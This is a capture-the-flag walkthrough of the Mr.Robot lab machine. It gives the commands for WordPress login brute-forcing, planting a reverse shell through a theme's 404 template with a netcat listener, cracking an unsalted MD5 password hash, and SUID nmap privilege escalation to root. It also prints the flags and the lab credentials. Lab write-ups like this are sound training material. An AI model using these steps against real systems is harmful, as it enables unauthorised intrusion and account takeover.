In this writeup, I will cover an awesome machine from VulnHub: Mr.Robot.
There is also a version of that machine on TryHackMe!
Description:
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Information gathering
The machine is distributed as a .ova VM image. After booting it you will see a login screen, but the author does not mention any credentials in the description. Let's look around and scan the network:
netdiscover -i eth0 -r 192.168.159.0/24
My Kali host has the IP 192.168.159.128 and Mr.Robot machine has 192.168.159.129.
Scanning open ports on Mr.Robot machine:
root@kali:~# nmap -sV 192.168.159.129
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
Opening the IP in a browser shows a site styled after the Mr.Robot TV series. Fancy, but useless.
Scanning this IP with Nikto:
root@kali:~# nikto -h 192.168.159.129
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names.
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
Checking the findings, I have discovered a few interesting pages: /readme.html, /license.txt, /wp-login.php and /robots.txt.
Let's start with /robots.txt:
User-agent: *
fsocity.dic
key-1-of-3.txt
Let's open this path in a browser or simply wget it from the terminal:
073403c8a58a1f80d943455fb30724b9
Hooray! We have found the easiest flag. Moving forward.
Let's have a look at the fsocity.dic file. Looks like a wordlist:
root@kali:~# head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
This wordlist contains a lot of duplicates; removing them will speed up the brute-force attack considerably. sort -u already drops duplicates, so the extra uniq is not needed:
sort -u fsocity.dic > newfsocity.dic
Now the list contains only 11k words instead of 800k+, which will save a lot of time.
The /wp-login.php page looks like the right place to apply this list.
According to /readme.html, the system is running WordPress version 4.3.9.
Brute force
Burp suite
There are plenty of tools designed for brute-force attacks; I will briefly cover a few of them as a bonus.
During my walkthrough, I used Turbo Intruder for Burp Suite, an incredibly fast way to get into the web application.
Just intercept the login request in Burp, double-click on the password value and choose "Send to turbo intruder".
The password value will be automatically replaced by the %s placeholder and the tool will do the rest.
POST /wp-login.php HTTP/1.1
Host: 192.168.159.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.129/wp-login.php?loggedout=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Cookie: s_fid=0F6464DBC5078D64-2082C0564C7815D5; s_nr=1571217063697; wp-settings-6=libraryContent%3Dbrowse; wp-settings-time-6=1571317217; s_cc=true; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1
log=elliot&pwd=%s&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.159.129%2Fwp-admin%2F&testcookie=1
As the whole machine has a "Mr.Robot flavor", my first guess was to try "Elliot" as a username.
After tuning Turbo Intruder a bit, I had the password in my hands:
ER28-0652
WPScan
Since this machine runs WordPress, it's a good idea to use tools designed specifically for it.
WPScan is a free black-box WordPress vulnerability scanner that comes preinstalled in Kali.
Fire it up and take a coffee break; it will take a while.
root@kali:~# wpscan --url 192.168.159.129 --wordlist ./newfsocity.dic --username elliot
---
[+] [SUCCESS] Login : elliot Password : ER28-0652
+----+--------+------+-----------+
| Id | Login | Name | Password |
+----+--------+------+-----------+
| | elliot | | ER28-0652 |
+----+--------+------+-----------+
We already have admin credentials, but let's also check for possible vulnerabilities here:
root@kali:~# wpscan -u 192.168.159.129 -e vp
We get a huge list of possible cross-site scripting issues, but nothing that helps us exploit the system any further.
Bonus
Let's have a look at /license.txt:
What you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=
Huh, interesting. Looks like a password encoded in base64:
root@kali:~# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode
elliot:ER28-0652
Perfect! You don't even need to brute force anything if the information gathering stage is done properly.
Using these credentials, we can log in to the admin panel at the /wp-login page.
Exploitation
From this point there are many attack vectors; for example, you can craft a malicious plugin and install it, or pull the data from the database.
We will follow probably the easiest way: RCE.
An example of a PHP reverse shell can be found at PentestMonkey.
From the admin panel at /wp-admin we can edit any template file; the first one in the list is "404 Template", so we will use that.
Just paste the PentestMonkey code into the editor and change the IP and port to your own.
On your host, open a terminal and set up a listener to catch the shell when it is triggered:
root@kali:~# nc -lvp 1337
listening on [any] 1337 ...
Open the 404.php page in a browser or trigger it with curl from your terminal:
root@kali:~# curl http://192.168.159.129/404.php
If the IP and port were set up properly, you will get a shell in the listener's terminal:
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
Hooray! You are in. Look around and open the /home/robot folder:
$ cd /home/robot
There are two files there: key-2-of-3.txt and password.raw-md5.
To be able to log in as the robot user we need a TTY shell:
python -c 'import pty; pty.spawn("/bin/sh")'
The second flag is very close, but you have a shell as the daemon user, who doesn't have access to this file.
Luckily, the password hash is lying right next to it. Open any MD5 lookup tool, for example MD5Online, and look up the hash:
Found : abcdefghijklmnopqrstuvwxyz
(hash = c3fcd3d76192e4007dfb496cca67e13b)
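The reason an online lookup works here is that password.raw-md5 stores an unsalted, single-round MD5 of the password, so every user who picks that string gets the same digest and a precomputed table resolves it instantly. The added example below (my code, not from the writeup) verifies the match locally and shows, for contrast, how a salted PBKDF2 hash of the same password differs per user; the function names are my own.

```python
import hashlib
import os

# Values from the writeup: contents of password.raw-md5 and the recovered password.
RAW_MD5 = "c3fcd3d76192e4007dfb496cca67e13b"
PASSWORD = "abcdefghijklmnopqrstuvwxyz"

def md5_matches(candidate, digest_hex):
    """Unsalted MD5: identical input always yields the identical digest,
    which is exactly what makes a lookup service like MD5Online work."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest_hex

def check_wordlist(words, digest_hex):
    """Offline equivalent of the lookup: first word whose MD5 matches, else None."""
    for w in words:
        if md5_matches(w, digest_hex):
            return w
    return None

def pbkdf2_hash(password, salt=None, rounds=200_000):
    """What password.raw-md5 should have used instead: a random per-user salt and
    an iterated KDF. Returns (salt_hex, digest_hex). Two users with the same
    password get different digests, so no shared lookup table exists."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt.hex(), dk.hex()

def pbkdf2_verify(password, salt_hex, digest_hex, rounds=200_000):
    # Recompute with the stored salt and compare; no lookup possible without the salt.
    return pbkdf2_hash(password, bytes.fromhex(salt_hex), rounds)[1] == digest_hex

if __name__ == "__main__":
    print("raw MD5 matches:", md5_matches(PASSWORD, RAW_MD5))
    s1, d1 = pbkdf2_hash(PASSWORD)
    s2, d2 = pbkdf2_hash(PASSWORD)
    print("same password, different salted digests:", d1 != d2)
```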
Going back to the terminal with the reverse shell:
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
Now we are logged in as the robot user and we can open key-2-of-3.txt:
$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
The second key is 822c73956184f694993bede3eb39f959.
Let's try to get root! We will need to do a [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation) for that.
First of all, we will check for any files that have the SUID bit set:
$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Interesting, nmap is installed. Checking its version:
robot@linux:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
This old version of nmap still has an "interactive" mode, from which you can run shell commands. Because the binary is SUID root (as the find output above shows), those commands run with root privileges.
The moment of truth:
$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Well done, we have the last flag now: 04787ddef27c3dee1ee161b21670b4e4
Conclusion
It was a solid entry-level machine with a classic exploitation flow. I recommend it for beginners; there are at least a few good learning points if you are not very experienced yet.